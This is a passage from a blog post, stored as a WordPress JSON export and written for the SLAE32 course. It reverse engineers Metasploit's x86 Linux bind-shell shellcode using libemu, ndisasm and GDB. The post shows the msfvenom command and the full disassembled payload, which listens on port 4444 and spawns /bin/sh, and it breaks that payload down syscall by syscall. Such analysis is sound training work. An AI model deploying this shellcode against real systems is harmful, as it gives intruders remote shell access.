{"id":284,"date":"2022-05-15T20:52:56","date_gmt":"2022-05-15T20:52:56","guid":{"rendered":"https:\/\/jacklgmcbride.co.uk\/blog\/?p=284"},"modified":"2023-10-06T13:00:11","modified_gmt":"2023-10-06T13:00:11","slug":"slae32-assignment-5-msfvenom-shellcode-analysis","status":"publish","type":"post","link":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/2022\/05\/15\/slae32-assignment-5-msfvenom-shellcode-analysis\/","title":{"rendered":"SLAE32 Assignment #5: MSFvenom Shellcode Analysis"},"content":{"rendered":"\n<p>In this blog post, we will be covering our process behind reverse engineering and understanding popular shellcode payloads maintained in the payload module of the <a href=\"https:\/\/www.metasploit.com\/\">Metasploit<\/a> project, <a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/msfvenom\/\">MSFvenom<\/a>.<\/p>\n\n\n\n<p>As this blog series is based on x86 Linux, this post will focus on payloads supporting this architecture and platform.<\/p>\n\n\n\n<p>This post is the fifth entry in the series of posts created for the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SLAE32<\/a> certification course provided by Pentester Academy.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p>MSFvenom, which was previously separated into the submodules <strong>Msfpayload<\/strong> and <strong>Msfencode<\/strong> is used to generate shellcode payloads for multiple platforms and architectures.<\/p>\n\n\n\n<p>The module supports a range of capabilities such as encoding, various platform and architecture support, and options for outputting shellcode in custom formats, such as for high level loaders written in C# and Python.<\/p>\n\n\n\n<p>To list the available MSFvenom shellcode payloads for x86 Linux, we can run the following command:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 5: MSFvenom Shellcode Analysis]\n\u2514\u2500# msfvenom -l payloads --platform linux --arch x86\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220502165337.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In this blog post, we will be analysing three unique x86 Linux shellcode payloads created using MSFVenom. Our chosen shellcodes are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shellcode 1: linux\/x86\/shell_bind_tcp<\/li>\n\n\n\n<li>Shellcode 2: linux\/x86\/adduser<\/li>\n\n\n\n<li>Shellcode 3: linux\/x86\/chmod<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Analysis Tools<\/h2>\n\n\n\n<p>Whilst we have popular frameworks such as Metasploit to generate shellcode which we know we can trust, it is helpful to know exactly what actions a given shellcode payload performs at an assembly level. To this end, it is recommended to perform analysis using the many available tools at our disposal.<\/p>\n\n\n\n<p>In this blog post, we will be covering the use of three core tools to disassemble, analyse and dissect the functionality of our chosen shellcodes. These tools are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Libemu<\/li>\n\n\n\n<li>Ndisasm<\/li>\n\n\n\n<li>GDB<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Libemu<\/h3>\n\n\n\n<p><a href=\"https:\/\/github.com\/buffer\/libemu\">Libemu<\/a> is an x86 shellcode detection and emulation tool.<\/p>\n\n\n\n<p>In this blog post, we will mostly stick to using the <strong>sctest<\/strong> program which is compiled as part of Libemu.<\/p>\n\n\n\n<p>To assist with installation of libemu, a helpful guide is provided by Ray Doyle on his <a href=\"https:\/\/www.doyler.net\/security-not-included\/libemu-installation\">blog<\/a>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm<\/h3>\n\n\n\n<p><a href=\"https:\/\/linux.die.net\/man\/1\/ndisasm\">Ndisasm<\/a> is a disassembler for 16 and 32-bit binary files. Ndisasm is included as part of standard Linux package managers. In our case, we install this using <strong>apt<\/strong> as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\napt install ndisasm\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">GDB<\/h3>\n\n\n\n<p><a href=\"https:\/\/www.sourceware.org\/gdb\/\">GDB<\/a> is a debugging and reverse engineering program used to examine binaries. We will be using this with the <a href=\"https:\/\/github.com\/longld\/peda\">PEDA<\/a> plugin.<\/p>\n\n\n\n<p>We begin with an analysis of the MSFvenom <strong>linux\/x86\/shell_bind_tcp<\/strong> shellcode.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 1: linux\/x86\/shell_bind_tcp<\/h2>\n\n\n\n<p>The purpose of a bind shell payload is to open and bind a socket on the target machine, listen for an incoming connection and spawn an interactive command shell.<\/p>\n\n\n\n<p>To validate that this is the true functionality of the shellcode, we will carry out static and dynamic analysis in the next section.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Emulation with Libemu<\/h3>\n\n\n\n<p>To begin, we use the <strong>sctest<\/strong> program from Libemu to emulate the <strong>linux\/x86\/shell_bind_tcp<\/strong> shellcode. We supply the arguments as follows:<\/p>\n\n\n\n<p><strong>msfvenom<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-p<\/strong>: Payload option set to linux\/x86\/shell_bind_tcp<\/li>\n\n\n\n<li><strong>R<\/strong>: Output shellcode in raw bytes<\/li>\n<\/ul>\n\n\n\n<p><strong>sctest<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-vvv<\/strong>: Set verbosity mode to 3.<\/li>\n\n\n\n<li><strong>-S<\/strong>: Read shellcode from stdin<\/li>\n\n\n\n<li><strong>-s<\/strong>: Run for 10,000 steps<\/li>\n\n\n\n<li><strong>-G<\/strong>: Save graphical output<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/shell_bind_tcp R | .\/sctest -vvv -Ss 10000 -G shell_bind_tcp.dot\n<\/pre><\/div>\n\n\n<p>Whilst the output of this command may at first be quite difficult to make sense of, the end of the command output shows a sort of 'pseudocode' rendition of a bind shell.<\/p>\n\n\n\n<p>Below, code resembling C is shown to be setting up the four main syscalls to <strong>socket<\/strong>, <strong>bind<\/strong>, <strong>listen<\/strong> and <strong>accept<\/strong> to initiate the bind shell connection. This is followed by calls to <strong>dup2<\/strong> which are used to redirect STDIN, STDOUT and STDERR to the established bind socket. Finally, the call to <strong>execve<\/strong> is made, which initiates the \/bin\/sh shell.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\nint socket (\n     int domain = 2;\n     int type = 1;\n     int protocol = 0;\n) =  14;\nint bind (\n     int sockfd = 14;\n     struct sockaddr_in * my_addr = 0x00416fc2 =&gt; \n         struct   = {\n             short sin_family = 2;\n             unsigned short sin_port = 23569 (port=4444);\n             struct in_addr sin_addr = {\n                 unsigned long s_addr = 0 (host=0.0.0.0);\n             };\n             char sin_zero = &quot;       &quot;;\n         };\n     int addrlen = 16;\n) =  0;\nint listen (\n     int s = 14;\n     int backlog = 0;\n) =  0;\nint accept (\n     int sockfd = 14;\n     sockaddr_in * addr = 0x00000000 =&gt; \n         none;\n     int addrlen = 0x00000010 =&gt; \n         none;\n) =  19;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 14;\n) =  14;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 13;\n) =  13;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 12;\n) =  12;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 11;\n) =  11;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 10;\n) =  10;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 9;\n) =  9;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 8;\n) =  8;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 7;\n) =  7;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 6;\n) =  6;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 5;\n) =  5;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 4;\n) =  4;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 3;\n) =  3;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 2;\n) =  2;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 1;\n) =  1;\nint dup2 (\n     int oldfd = 19;\n     int newfd = 0;\n) =  0;\nint execve (\n     const char * dateiname = 0x00416fb2 =&gt; \n           = &quot;\/bin\/\/sh&quot;;\n     const char * argv&#x5B;] = &#x5B;\n           = 0x00416faa =&gt; \n               = 0x00416fb2 =&gt; \n                   = &quot;\/bin\/\/sh&quot;;\n           = 0x00000000 =&gt; \n             none;\n     ];\n     const char * envp&#x5B;] = 0x00000000 =&gt; \n         none;\n) =  0;\n<\/pre><\/div>\n\n\n<p>From the above, we can infer each syscall including the arguments used. From here, we can find out more information about each syscall by using the Linux man pages.<\/p>\n\n\n\n<p>Below are the function headers of each syscall which we have taken from the Libemu output:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint socket(int domain, int type, int protocol);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint listen(int sockfd, int backlog);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint dup2(int oldfd, int newfd);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>The above function headers are enough for us to start recreating the bind shell payload in assembly.<\/p>\n\n\n\n<p>As we have used the <strong>-G<\/strong> option with Libemu, the above information is also presented graphically in the file <strong>shell_bind_tcp.dot<\/strong>. To view this file, we first convert it to a PNG using the <strong>dot<\/strong> command below.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ndot shell_bind_tcp.dot -T png -o shell_bind_tcp.png\n<\/pre><\/div>\n\n\n<p>In the image below, we can clearly see the calls made to each syscall and understand the corresponding assembly instructions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/shell_bind_tcp.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Disassembly with Ndisasm<\/h3>\n\n\n\n<p>To complement the graphical output provided by Libemu, we can next use ndisasm to disassemble the payload into its assembly instructions:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/shell_bind_tcp R | ndisasm -u -\n\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 78 bytes\n\n00000000  31DB              xor ebx,ebx\n00000002  F7E3              mul ebx\n00000004  53                push ebx\n00000005  43                inc ebx\n00000006  53                push ebx\n00000007  6A02              push byte +0x2\n00000009  89E1              mov ecx,esp\n0000000B  B066              mov al,0x66\n0000000D  CD80              int 0x80\n0000000F  5B                pop ebx\n00000010  5E                pop esi\n00000011  52                push edx\n00000012  680200115C        push dword 0x5c110002\n00000017  6A10              push byte +0x10\n00000019  51                push ecx\n0000001A  50                push eax\n0000001B  89E1              mov ecx,esp\n0000001D  6A66              push byte +0x66\n0000001F  58                pop eax\n00000020  CD80              int 0x80\n00000022  894104            mov &#x5B;ecx+0x4],eax\n00000025  B304              mov bl,0x4\n00000027  B066              mov al,0x66\n00000029  CD80              int 0x80\n0000002B  43                inc ebx\n0000002C  B066              mov al,0x66\n0000002E  CD80              int 0x80\n00000030  93                xchg eax,ebx\n00000031  59                pop ecx\n00000032  6A3F              push byte +0x3f\n00000034  58                pop eax\n00000035  CD80              int 0x80\n00000037  49                dec ecx\n00000038  79F8              jns 0x32\n0000003A  682F2F7368        push dword 0x68732f2f\n0000003F  682F62696E        push dword 0x6e69622f\n00000044  89E3              mov ebx,esp\n00000046  50                push eax\n00000047  53                push ebx\n00000048  89E1              mov ecx,esp\n0000004A  B00B              mov al,0xb\n0000004C  CD80              int 0x80\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503074312.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This output gives us the assembly instructions used to recreate the payload.<\/p>\n\n\n\n<p>Next, we break down the above assembly instructions per syscall.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">socket<\/h4>\n\n\n\n<p>To begin, the assembly code creates a socket to establish connections over.<\/p>\n\n\n\n<p>The function header for the call to <strong>socket<\/strong> is as follows.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nint socket(int domain, int type, int protocol);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>socket<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n00000000  31DB              xor ebx,ebx\n00000002  F7E3              mul ebx\n00000004  53                push ebx\n00000005  43                inc ebx\n00000006  53                push ebx\n00000007  6A02              push byte +0x2\n00000009  89E1              mov ecx,esp\n0000000B  B066              mov al,0x66\n0000000D  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>To begin, the <strong>EBX<\/strong>, <strong>EAX<\/strong> and <strong>EDX<\/strong> registers are set to null. This is done by first <strong>XOR<\/strong>ing <strong>EBX<\/strong>, and then using the <strong>mul<\/strong> instruction, which multiplies <strong>EAX<\/strong> by <strong>EBX<\/strong>, implicitly setting <strong>EDX<\/strong> to null.<\/p>\n\n\n\n<p>Next, <strong>EBX<\/strong> (<strong>0<\/strong>) is pushed to the stack, incremented by <strong>1<\/strong>, and pushed to the stack again. After this, <strong>0x2<\/strong> is pushed to the stack. This sets the arguments for <strong>socket<\/strong> as follows:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>domain - 2<\/li>\n\n\n\n<li>type - 1<\/li>\n\n\n\n<li>protocol - 0<\/li>\n<\/ul>\n\n\n\n<p>Once they are set, the <strong>ESP<\/strong> register is moved into <strong>ECX<\/strong>, which is used to store the arguments for the syscall. Next, the syscall number (<strong>0x66<\/strong>) for <strong>socketcall<\/strong> is moved into <strong>AL<\/strong>, and the soft interrupt (<strong>int 0x80<\/strong>) is called, initiating the syscall for <strong>socket<\/strong>.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>socket<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>domain<\/td><td>0x2<\/td><\/tr><tr><td>socket<\/td><td>type<\/td><td>0x1<\/td><\/tr><tr><td>socket<\/td><td>protocol<\/td><td>0x0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">bind<\/h4>\n\n\n\n<p>Next, the <strong>bind<\/strong> syscall is used to associate the socket to an address, port and protocol family.<\/p>\n\n\n\n<p>The function header for the call to <strong>bind<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>bind<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n0000000F  5B                pop ebx\n00000010  5E                pop esi\n00000011  52                push edx\n00000012  680200115C        push dword 0x5c110002\n00000017  6A10              push byte +0x10\n00000019  51                push ecx\n0000001A  50                push eax\n0000001B  89E1              mov ecx,esp\n0000001D  6A66              push byte +0x66\n0000001F  58                pop eax\n00000020  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>Following the above assembly code, the bind syscall is structured as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>-<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>File descriptor of the socket<\/td><td>host_sockid<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>Socket address family, host address and port<\/td><td>&amp;hostaddr<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Size in bytes of address structure pointed to by addr<\/td><td>sizeof(hostaddr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>To begin, the last value which was pushed to the stack, which was <strong>0x2<\/strong> for the <strong>domain<\/strong> argument of the call to <strong>socket<\/strong>, is popped into <strong>EBX<\/strong>. The next value, on the stack, <strong>0x1<\/strong> is then popped into <strong>ESI<\/strong>.<\/p>\n\n\n\n<p>Next, the <strong>sockaddr_in<\/strong> structure is pushed to the stack.<\/p>\n\n\n\n<p>The breakdown of this struct is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Struct<\/th><th>Argument<\/th><th>Man Reference<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>sockaddr_in<\/td><td>sin_family<\/td><td>Address family<\/td><td>AF_INET - 2<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_port<\/td><td>TCP port to listen on in network byte order<\/td><td>4444 - 0x5c11<\/td><\/tr><tr><td>sockaddr_in<\/td><td>sin_addr<\/td><td>Host IP address in network byte order<\/td><td>INADDR_ANY - 0x00000000<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>To begin, the <strong>EDX<\/strong> register, which contains null is pushed to the stack, supplying the <strong>sin_addr<\/strong> value. Next, a <strong>dword<\/strong> value containing the socket address family (<strong>2<\/strong>) and port (<strong>4444<\/strong> or <strong>0x5c11<\/strong>) is pushed to the stack. Next, the value <strong>0x10<\/strong> for the <strong>addrlen<\/strong> argument is pushed to the stack, as well as the <strong>ECX<\/strong> register, which points to the start of the <strong>sockaddr_in<\/strong> structure.<\/p>\n\n\n\n<p>Next, the <strong>EAX<\/strong> register, which contains the <strong>sockfd<\/strong> value returned from the <strong>socket<\/strong> syscall, is pushed to the stack.<\/p>\n\n\n\n<p>Once the <strong>bind<\/strong> arguments are set, the <strong>ESP<\/strong> stack pointer is moved into <strong>ECX<\/strong>, which points to their location on the stack. Next, the syscall number (<strong>0x66<\/strong>) for <strong>socketcall<\/strong> is moved into <strong>AL<\/strong>, and the soft interrupt (<strong>int 0x80<\/strong>) is called, initiating the syscall for <strong>bind<\/strong>.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>bind<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall number<\/td><td>syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>socketcall value for bind<\/td><td>0x2<\/td><\/tr><tr><td>bind<\/td><td>sockfd<\/td><td>socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>bind<\/td><td>addr<\/td><td>sockaddr_in structure<\/td><td>2, 0x5c11, NULL<\/td><\/tr><tr><td>bind<\/td><td>addrlen<\/td><td>Length of addr in bytes<\/td><td>0x10<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">listen<\/h4>\n\n\n\n<p>Next, we look at the implementation of the <strong>listen<\/strong> call, which is used to listen for connections made to the previous created socket.<\/p>\n\n\n\n<p>The function header for the call to <strong>listen<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint listen(int sockfd, int backlog);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>listen<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n00000022  894104            mov &#x5B;ecx+0x4],eax\n00000025  B304              mov bl,0x4\n00000027  B066              mov al,0x66\n00000029  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>To begin, the value <strong>0x4<\/strong> is moved for the socketcall <strong>call<\/strong> argument. Next, the <strong>0x66<\/strong> syscall value for <strong>socketcall<\/strong> is moved into <strong>EAX<\/strong> and the soft interrupt (<strong>int 0x80<\/strong>) is made.<\/p>\n\n\n\n<p>At the time this is called, the <strong>ECX<\/strong> register is pointing to the previously pushed <strong>sockfd<\/strong> value and a <strong>backlog<\/strong> value set to 0.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>listen<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>-<\/td><\/tr><tr><td>listen<\/td><td>sockfd<\/td><td>File descriptor of the socket<\/td><td>host_sockid<\/td><\/tr><tr><td>listen<\/td><td>backlog<\/td><td>Maximum number of pending connections<\/td><td>2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">accept<\/h4>\n\n\n\n<p>Next, we look at the call to the <strong>accept<\/strong> function, which is used to accept a connection request made by a client.<\/p>\n\n\n\n<p>The function header for <strong>accept<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n<\/pre><\/div>\n\n\n<p>The assembly code for the call to <strong>accept<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n0000002B  43                inc ebx\n0000002C  B066              mov al,0x66\n0000002E  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>Next, the call to accept is made. As most of this structure is populated by the OS based on the incoming socket, the required assembly instructions are minimal. Namely, the <strong>addr<\/strong> and <strong>addrlen<\/strong> arguments do not have to be provided by the programmer.<\/p>\n\n\n\n<p>The <strong>sockfd<\/strong> value, which is already stored by <strong>ECX<\/strong> as of the call to <strong>listen<\/strong>, is already set correctly for the <strong>accept<\/strong> call. As a result, all that is needed is to move the socketcall number for <strong>accept<\/strong> (<strong>0x5<\/strong>) into <strong>EBX<\/strong> by incrementing it, and then making the syscall.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>accept<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Determines which socket function to invoke<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Points to a block containing the actual arguments<\/td><td>-<\/td><\/tr><tr><td>accept<\/td><td>sockfd<\/td><td>File descriptor that refers to a socket of type SOCK_STREAM<\/td><td>host_sockid<\/td><\/tr><tr><td>accept<\/td><td>addr<\/td><td>Pointer to the incoming socket's sockaddr structure<\/td><td>NULL<\/td><\/tr><tr><td>accept<\/td><td>addrlen<\/td><td>Size in bytes of the incoming socket's sockaddr structure<\/td><td>NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">dup2<\/h4>\n\n\n\n<p>Next, we look at the implementation of <strong>dup2<\/strong>, which is used to redirect STDIN, STDOUT and STDERR to the connecting socket.<\/p>\n\n\n\n<p>The function header for <strong>dup2<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint dup2(int oldfd, int newfd);\n<\/pre><\/div>\n\n\n<p>The assembly code for the syscall to <strong>dup2<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n00000030  93                xchg eax,ebx\n00000031  59                pop ecx\n00000032  6A3F              push byte +0x3f\n00000034  58                pop eax\n00000035  CD80              int 0x80\n00000037  49                dec ecx\n00000038  79F8              jns 0x32\n<\/pre><\/div>\n\n\n<p>First, the <strong>xchg<\/strong> instruction is called to swap the values of <strong>EAX<\/strong> and <strong>EBX<\/strong>. The <strong>ESP<\/strong> register, which points to the <strong>sockfd<\/strong> value from the previous call, is popped into <strong>ECX<\/strong>. Next, the syscall value for <strong>dup2<\/strong> (<strong>0x3f<\/strong>) is popped into <strong>EAX<\/strong> and the syscall is made.<\/p>\n\n\n\n<p>There are two additional instructions after the syscall is made, <strong>dec ECX<\/strong> and <strong>jns 0x32<\/strong>. The <strong>jns<\/strong>, or '<strong>Jump Not Sign<\/strong>' instruction jumps to the specified label if the sign flag is not set. The sign flag is set following an operation that results in a negative number.<\/p>\n\n\n\n<p>The final two instructions create a loop which, upon each syscall to <strong>dup2<\/strong>, decrements the value of <strong>ECX<\/strong> storing <strong>newfd<\/strong>. This value is the new file descriptor, and will be set to 2, 1 and 0 to redirect input from STDERR, STDOUT and STDIN respectively to the established socket.<\/p>\n\n\n\n<p>For reference, the argument breakdown for the syscall to <strong>dup2<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>dup2<\/td><td>oldfd<\/td><td>File descriptor that refers to a socket of type SOCK_STREAM<\/td><td>host_sockid<\/td><\/tr><tr><td>dup2<\/td><td>newfd<\/td><td>New file descriptor<\/td><td>0, 1 and 2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">execve<\/h3>\n\n\n\n<p>Finally is the call to <strong>execve<\/strong>, which is responsible for executing a given program.<\/p>\n\n\n\n<p>The function header for <strong>execve<\/strong> is defined as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>The assembly code for the syscall to <strong>execve<\/strong> is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n0000003A  682F2F7368        push dword 0x68732f2f\n0000003F  682F62696E        push dword 0x6e69622f\n00000044  89E3              mov ebx,esp\n00000046  50                push eax\n00000047  53                push ebx\n00000048  89E1              mov ecx,esp\n0000004A  B00B              mov al,0xb\n0000004C  CD80              int 0x80\n<\/pre><\/div>\n\n\n<p>To begin, the <strong>pathname<\/strong> argument, in this case set as two dwords to <strong>\/bin\/\/sh<\/strong> is pushed to the stack. The <strong>ESP<\/strong> register is moved into <strong>EBX<\/strong>, storing the pointer to the <strong>pathname<\/strong> argument in that register. 